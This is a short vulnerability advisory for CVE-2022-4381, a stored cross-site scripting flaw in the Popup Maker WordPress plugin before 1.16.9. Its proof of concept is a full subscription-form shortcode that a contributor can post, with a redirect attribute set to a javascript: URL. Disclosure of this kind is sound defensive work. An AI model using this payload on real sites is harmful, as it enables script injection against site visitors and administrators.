Popup Maker < 1.16.9 – Contributor+ Stored XSS via Subscription Form | CVE 2022-4381

Description

The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the following shortcode in a post/page

[pum_sub_form name_field_type="fullname" label_name="Name" label_email="Email" label_submit="Subscribe" placeholder_name="Name" placeholder_email="Email" form_layout="block" form_alignment="center" form_style="default" privacy_consent_enabled="yes" privacy_consent_label="Notify me about related content and special offers." privacy_consent_type="radio" privacy_consent_radio_layout="inline" privacy_consent_yes_label="Yes" privacy_consent_no_label="No" privacy_usage_text="If you opt in above we use this information send related content, discounts and other special offers." redirect_enabled redirect="javascript:alert(/XSS/)"] 

The XSS will be triggered when previewing/viewing the post/page and submitting the form